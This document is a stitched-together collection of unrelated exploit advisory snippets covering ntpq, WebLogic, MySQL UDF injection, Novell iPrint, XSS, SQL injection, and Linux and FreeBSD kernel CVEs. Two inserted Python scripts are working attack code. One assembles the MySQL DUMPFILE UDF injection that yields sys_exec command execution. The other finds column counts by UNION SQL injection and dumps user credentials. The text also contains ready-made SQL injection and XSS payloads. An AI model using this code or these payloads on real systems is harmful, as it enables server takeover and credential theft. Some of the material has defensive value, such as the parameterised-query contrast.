There is a local heap overflow in the ntpq utility client packaged in ntp-4.2.6p1-2.fc13. The binary is NOT setuid/setgid on the system, so the bug gives no privilege boundary to cross; nonetheless, it makes for an interesting analysis exercise.
The Oracle WebLogic servlet session cookie can be fixated via an HTTP POST request. This type of session fixation attack has been confirmed with different session descriptor elements. In particular, the attack has also been confirmed with the session descriptor element <url-rewriting-enabled> set to 'False'. That setting prevents session fixation via an HTTP GET request but fails to mitigate session fixation performed over HTTP POST.
This module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... INTO DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (<= 5.5.9), directory write permissions are not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine the sys_eval() and sys_exec() functions.
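As an added illustration of the DUMPFILE technique named above (this is not the module's own code), the helper below assembles the statement sequence an attacker would send over an existing MySQL connection: the DLL is passed as a single hex literal, written raw with SELECT ... INTO DUMPFILE (unlike INTO OUTFILE, DUMPFILE performs no escaping and appends no newline, which is why it is usable for binaries), then registered with CREATE FUNCTION. The plugin directory path, the DLL bytes and the DLL file name are placeholders; the function names sys_eval and sys_exec are the ones the module defines.

```python
# Added example: assembles the MySQL statements used by the
# SELECT ... INTO DUMPFILE UDF injection technique.
# Assumptions: plugin_dir and the DLL bytes are placeholders; a real DLL
# exporting sys_eval/sys_exec would be supplied by the caller.

def hex_literal(data: bytes) -> str:
    # DUMPFILE writes the selected value verbatim, so the binary is carried
    # as one hex literal that the server decodes back to the original bytes.
    return "0x" + data.hex()

def udf_statements(dll: bytes, plugin_dir: str,
                   dll_name: str = "lib_mysqludf_sys.dll") -> list:
    # Since MySQL 5.0.67 a UDF library must live in plugin_dir; on the
    # default Windows install the service (LocalSystem) can write there.
    path = plugin_dir.rstrip("\\/") + "\\" + dll_name
    # Backslashes must be doubled inside a MySQL string literal.
    sql_path = path.replace("\\", "\\\\")
    return [
        # DUMPFILE refuses to overwrite an existing file, so the name must be
        # new on the target or the first statement fails with "File exists".
        f"SELECT {hex_literal(dll)} INTO DUMPFILE '{sql_path}';",
        f"CREATE FUNCTION sys_exec RETURNS INTEGER SONAME '{dll_name}';",
        f"CREATE FUNCTION sys_eval RETURNS STRING SONAME '{dll_name}';",
    ]

def invoke_sys_exec(command: str) -> str:
    # Once registered, the UDF runs as the MySQL service account.
    # Single quotes are doubled so the command stays inside the literal.
    return f"SELECT sys_exec('{command.replace(chr(39), chr(39) * 2)}');"

if __name__ == "__main__":
    # Constructed stand-in for a DLL: just an MZ header, not a real library.
    fake_dll = b"MZ\x90\x00"
    for stmt in udf_statements(fake_dll, "C:\\mysql\\lib\\plugin"):
        print(stmt)
    print(invoke_sys_exec("whoami > C:\\out.txt"))
```

The three statements must be sent as separate queries (a stacked-query injection point or a direct client connection); CREATE FUNCTION requires INSERT on mysql.func, and FILE privilege is needed for DUMPFILE, which is why the module assumes a high-privilege account.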
This module exploits a stack buffer overflow in Novell iPrint Client 5.52. When an overly long string is passed to the GetDriverSettings() property of ienipp.ocx, an attacker may be able to execute arbitrary code.
The value of the ctl00%24MPH%24wucContactInfo%24txtEmailAddress_SettingText request parameter submitted to the URL /Main/frmContact.aspx is copied into the HTML document as plain text between tags at the URL /Main/frmPopupContactsList.aspx. The payload 9e8e5<script>alert(1)</script>5b211c9e81 was submitted in the ctl00%24MPH%24wucContactInfo%24txtEmailAddress_SettingText parameter. This input was returned unmodified in a subsequent request for the URL /Main/frmPopupContactsList.aspx, i.e. the value is stored and later rendered without output encoding (stored XSS), not merely reflected in the same response.
An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application through the 'ctf' parameter of the 'products.php' page. Using the 'UNION' operator, an attacker can retrieve data from other tables, provided the injected SELECT returns the same number of columns as the original query (43 here, indices 0 to 42). For example, the following URL retrieves rows from the 'users' table: http://localhost.com/products.php?ctf=-1+union+select+0,1,2,3,4,5,6,concat%28ID,username,password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users
This vulnerability allows an attacker to inject SQL into a web application designed by LUCH and hosted on http://www.luch.co.il. The vulnerability was discovered by p0pc0rn and affects the page.asp, cat.asp, and catin.asp pages. The attacker injects SQL by appending it to the 'id' parameter in the URL; for example, appending 'union select 1 from test.a' to http://site.com/page.asp?id=23.
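The two advisories above (the products.php 'ctf' injection and the LUCH page.asp 'id' injection) both rely on the same mechanics: user input spliced into the SQL text, a UNION whose column count matches the original SELECT, and the interesting data packed into one column. The added example below, which is not code from either advisory or application, reproduces that on a constructed in-memory SQLite database so it runs offline: it finds the column count with ORDER BY probing (the general step that produced the 43-column payload above), dumps the users table through the vulnerable query, and shows that the same payload is inert against a parameterised query. The schema, table contents and function names are assumptions; MySQL's concat() is written with SQLite's || operator.

```python
# Added example (not the advisories' code): UNION-based SQL injection against a
# string-built query versus a parameterised one, on a constructed SQLite DB.
# Assumptions: a 4-column products table and a users(ID, username, password)
# table stand in for the real, unknown schemas of the two targets.
import sqlite3

def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL, stock INTEGER);
        INSERT INTO products VALUES (23, 'Widget', 9.99, 5);
        CREATE TABLE users(ID INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return conn

def vulnerable_lookup(conn, ctf):
    # The pattern behind products.php?ctf=... and page.asp?id=...:
    # the request parameter is concatenated into the SQL text.
    sql = "SELECT id, name, price, stock FROM products WHERE id = " + str(ctf)
    return conn.execute(sql).fetchall()

def hardened_lookup(conn, ctf):
    # Parameterised form: the value is bound, never parsed as SQL,
    # so a UNION in the input is just a string that matches no id.
    return conn.execute(
        "SELECT id, name, price, stock FROM products WHERE id = ?", (ctf,)
    ).fetchall()

def find_column_count(conn, max_cols=64):
    # ORDER BY n succeeds only while n <= number of selected columns;
    # the first n that errors out reveals the width the UNION must match.
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"23 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None

def union_dump_users(conn):
    cols = find_column_count(conn)
    # Pack the credentials into one column and pad the rest with numbers,
    # exactly as the concat(ID,username,password) payload above does.
    filler = ["0"] * cols
    filler[1] = "ID || ':' || username || ':' || password"
    payload = "-1 UNION SELECT " + ", ".join(filler) + " FROM users"
    return [row[1] for row in vulnerable_lookup(conn, payload)]

if __name__ == "__main__":
    db = build_db()
    print("columns:", find_column_count(db))
    print("vulnerable:", union_dump_users(db))
    print("hardened:", hardened_lookup(db, "-1 UNION SELECT 0,0,0,0 FROM users"))
```

The -1 in the payload is chosen so the original SELECT contributes no rows and only the UNIONed users data comes back in the page; the second column is used for the concatenation because it is the one the page renders as the product name.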
This exploit triggers CVE-2010-4165, a divide-by-zero error in net/ipv4/tcp.c. Because the fault occurs on the softirq path, the kernel oopses and then dies completely with no chance of recovery.
This is an exploit for CVE-2008-5736, the FreeBSD protosw vulnerability, loosely based on Don Bailey's 2008 exploit. It works reliably on kernels at or below 6.4-RELEASE. It's an oldie, but simple enough that someone needed to write another PoC exploit at some point.
A CSRF vulnerability exists in RecordPress 0.3.1 that allows an attacker to change the admin password by having an authenticated administrator submit a forged request. An XSS vulnerability also exists that allows an attacker to inject malicious JavaScript code into the application.